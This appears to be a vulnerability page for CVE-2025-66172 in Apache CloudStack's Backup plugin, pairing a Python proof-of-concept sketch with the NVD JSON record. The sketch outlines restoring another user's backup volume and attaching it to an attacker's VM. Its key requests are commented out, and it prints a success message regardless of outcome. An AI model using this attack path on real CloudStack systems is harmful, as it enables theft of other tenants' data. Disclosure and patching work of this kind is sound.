CVE-2025-66172

# PoC Concept for CVE-2025-66172 # Requires valid CloudStack API keys import requests def exploit_backup_restore(target_api, api_key, secret, victim_backup_id, attacker_vm_id): headers = {'Content-Type': 'application/x-www-form-urlencoded'} # Step 1: Restore volume from victim's backup # Vulnerability: API does not check ownership of victim_backup_id restore_params = { 'command': 'restoreVolumeFromBackup', 'backupid': victim_backup_id, 'apiKey': api_key, 'response': 'json' } # Signature generation logic omitted for brevity print(f"[*] Attempting to restore volume from backup: {victim_backup_id}") # r_restore = requests.post(target_api, data=restore_params, headers=headers) # restored_volume_id = r_restore.json()['restorevolumefrombackupresponse']['id'] # Step 2: Attach restored volume to attacker's VM # attach_params = { # 'command': 'attachVolume', # 'id': restored_volume_id, # 'virtualmachineid': attacker_vm_id, # 'apiKey': api_key, # 'response': 'json' # } # r_attach = requests.post(target_api, data=attach_params, headers=headers) print("[+] Exploit executed: Volume restored and attached (if vulnerable)") # Example usage # exploit_backup_restore('http://target:8080/client/api', 'attacker_key', 'attacker_secret', 'uuid-of-victim-backup', 'uuid-of-attacker-vm')

{"cve": {"id": "CVE-2025-66172", "sourceIdentifier": "[email protected]", "published": "2026-05-08T13:16:35.607", "lastModified": "2026-05-12T13:30:53.190", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The CloudStack Backup plugin has an improper access logic in versions 4.21.0.0 and 4.22.0.0. Anyone with authenticated user-account access in CloudStack 4.21.0.0+ environments, where this plugin is enabled and have access to specific APIs can restore a volume from any other user's backups and attach the volume to their own VMs.\n\nBackup plugin users using CloudStack 4.21.0.0+ are recommended to upgrade to CloudStack version 4.22.0.1, which fixes this issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-359"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.21.0.0", "versionEndExcluding": "4.22.0.1", "matchCriteriaId": "78690ED1-C4B3-4DC9-9B53-FB31D6D17125"}]}]}], "references": [{"url": "https://lists.apache.org/thread/n8mt5b7wkpysstb8w7rr9f02kc5cq2xm", "source": "[email protected]", "tags": ["Mailing List", "Third Party Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/09/3", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}